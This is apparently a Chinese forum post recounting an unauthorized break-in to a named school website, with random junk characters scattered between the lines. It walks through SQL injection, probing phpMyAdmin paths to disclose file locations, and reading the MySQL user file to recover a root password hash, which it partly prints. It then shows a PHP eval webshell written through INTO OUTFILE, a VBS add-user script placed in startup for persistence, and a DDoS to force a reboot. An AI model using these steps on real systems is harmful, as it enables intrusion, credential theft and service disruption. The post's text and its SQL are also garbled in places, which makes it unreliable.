第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏2 P2 g# e I) e
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
3 s2 \ @( P; {7 R8 @- o6 X8 e/ i- Z/ W; E+ H) ^1 W, Z( ?& B
) ]6 |& X: O2 U- M2 N# z ?3 H3 Y2 u q2 l. j7 I. R
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 " o; ~ @# [2 e+ m) n) `
% U4 X$ H N T/ p% Y: D那么想可以直接写入shell ,getshell有几个条件:3 G7 A0 c) d: r# u" I6 ^( ^
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF + u ]% k u8 _+ {
& X9 r ~; ^# n5 J A- j. [' e
试着爆绝对路径:
+ N: ?# v" A& s( y2 z1./phpMyAdmin/index.php?lang[]=1 ) x+ @; Z3 C" \* P& p( }1 E: K
2./phpMyAdmin/phpinfo.php
$ n ?3 t* ?' T4 H, o' B3./load_file() * r6 \3 P4 q& s7 s
4./phpmyadmin/themes/darkblue_orange/layout.inc.php ! V4 c$ i D7 h! m
5./phpmyadmin/libraries/select_lang.lib.php " j {' V5 X; A# _
6./phpmyadmin/libraries/lect_lang.lib.php 6 ^* g: S, Q5 g* Q* x: l8 o
7./phpmyadmin/libraries/mcrypt.lib.php
- z! c" l+ K- I. c4 J, w R/ C8./phpmyadmin/libraries/export/xls.php $ P ?. }* j* a- H
1 g' y$ V, \8 L8 |- S2 D
均不行...........................
3 b' g& Q7 l4 H$ e! P' `! [
" ?0 z1 g0 \7 C% x; c% J6 ^御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
0 l4 i# {! z! Z( y" A! g. E! L, q. @$ I0 S5 w% K% |
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 6 t S8 R8 q0 ]
# I8 Y' m. N X' J& Q, L
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 9 {& Y4 F1 [3 ~# h; G7 F M
1 B9 U8 m7 e/ Q( I$ w+ e- j/ ^敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
: F# C# r1 C9 L& c$ @: P9 b5 B2 u$ ~% Q' o% N/ V8 b+ `
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ; e! a* t' a% H: \1 @/ V
$ d( F, N, [8 `/ R
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini # J) x& B: \4 s2 }& ] q
4 h4 ?: j0 L5 G9 }( ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
( [& ?, ^! P& k" @3 s, g6 b; Q: m# ~5 i" O# W* G L) m7 b
成功读到root密码:
- b7 N# J4 S. ~6 G; L& ]1 S+ i7 Y& c9 B) {% d. T- K, x# i5 _
17---- r(0072) % W: L, G- j1 a! H& F# k3 \0 D
18---- o(006f) % X( L* N* s# C' ~# p/ J0 T* |4 S A
19---- o(006f)
! e* S3 ~* ^! {+ u: [2 O7 L8 U20---- t(0074)
; u# a# _ I+ P* o7 p2 n21---- *(002a) 9 L+ W: e h! X7 i- V
22---- 8(0038)
# u7 G& {: o; n& M7 S d8 ]23---- 2(0032) # H$ R! {/ R# y
24---- E(0045) 7 P4 j; Y5 B. h9 w: F! v. ?6 m$ I
25---- 1(0031)
9 Q' S7 [1 I3 n0 }26---- C(0043)
9 f/ o! g4 Z% E( Y27---- 5(0035)
6 \) D3 R/ V/ O# x28---- 8(0038) ) h) t( x2 F1 Y6 c; s) f
29---- 2(0032) " M. P t0 i( {( G2 Q. g! y% T
30---- 8(0038) 0 d9 c! `$ p/ _4 I* ]
31---- A(0041) 4 n, k+ w6 v+ O: c& ~! y
32---- 9(0039)
6 e# D+ R+ g8 k: b1 R33---- B(0042) * R, B5 B2 h9 [5 b7 [; d. d& X
34---- 5(0035) ; a: m, K' O8 i% m0 w; ?; E
35---- 4(0034) ) E" i# f! P: p8 f! C" s
36---- 8(0038)
. ? G! _0 n8 T( w0 S: ]: {37---- 6(0036) c1 j; b5 L* X( H8 ^5 V' Z& c
38---- 4(0034) ' c) E! v+ D; h' u$ l
39---- 9(0039)
# \/ K' l% C! s" f40---- 1(0031)
0 |" ]+ @, |7 D41---- 1(0031)
; U8 ?% F8 d: j. @# b/ |* Q% h42---- 5(0035)
) [/ i+ E# `; H43---- 3(0033) ?: k: q7 Q9 u. l7 G
44---- 5(0035) % q+ J0 ^+ y0 L
45---- 9(0039) 8 e' u) e& x8 y9 m) T2 r6 D
46---- 8(0038) 8 I1 P4 L3 _1 D/ W) B
47---- F(0046) % p! v5 @% Y' ]# ~$ p4 k4 {, B
48---- F(0046) & A& n3 q, L, J. z
49---- 4(0034) & r/ h# ^: L( [! F% A* Z& q, M x
50---- F(0046)
8 u/ Q! [5 w- O% {51---- 0(0030)
9 O- ~0 G/ J6 F52---- 3(0033)
: x) X6 F* r# s, x53---- 2(0032)
6 [- \% B- \3 S54---- A(0041) - g. |# W' d' S; h6 ^( S
55---- 4(0034) 5 K, G( ^ ]2 s: p5 x. d
56---- A(0041) t, @" T( K K% |7 {: Q7 p
57---- B(0042)
4 {( V# J, Q# Y0 Y# H58---- *(0044) ( Z5 p. i) Z4 ]; L6 E
59---- *(0035)
% l- O4 j; L6 s$ {2 S/ @ B1 E60---- *(0041)
4 ]0 G5 @& \) r3 e/ w61---- *0032) 9 F! z1 A1 C/ J$ j# Z" s1 P4 q+ g
* S' ~0 v5 X( P+ r* K9 S
解密后成功登陆phpmyamin 0 O( n0 Q: R( [) I9 n
: M1 R1 ^( m5 t9 `
0 `" ~+ ?+ p, X' O* H$ i9 \ : H+ k( ^/ H' o( e' x- n
" q- [* O2 a* n) p找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' % o" x* s- k$ |' g
% G+ X) ]3 h3 {/ C成功执行,拿下shell,菜刀连接: / ]# }$ r" E0 G1 \5 `- e. }6 C
6 ~3 T: G6 Y( ^服务器不支持asp,aspx,php提权无果...................
X L F8 g* J( D: _: J
, s1 m- w7 ?$ a2 [. C: y9 w; N但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: & |" L0 Z+ X. D. r9 R
服务器上已经有个隐藏帐号了
/ l Q8 \0 J; H y7 M7 H0 }/ l别名 administrators
' P$ g$ ?8 A" B9 C- A注释 管理员对计算机/域有不受限制的完全访问权 7 ?- h S' k' g. p( Q2 a8 q' f
成员 ! m2 X7 `+ k' [/ L& P" R
-------------------------------------------------------------------------------; {) o8 s( d- M! P, {* n: w
admin
! D/ {0 A$ w* S% t/ s4 QAdministrator
% | i! F, p0 sslipper$
# q+ I) i7 C. a6 @* wsqluser
$ u$ j, ~5 p1 Y. a& G; m" a命令成功完成。
/ w9 p! r L, P
, B2 A" b& B; I1 T9 N$ Z服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
! A1 }1 \7 \0 u% q5 s$ S1 l
/ L0 d; ] x& U; }/ A5 Xddos服务器重启,不然就只能坐等服务器重启了...............................
6 P- p# M$ [9 T
# Z* u5 A, D0 j( N! d5 `# c* Y0 H
m& f. x* p4 Q1 r% U' l9 C |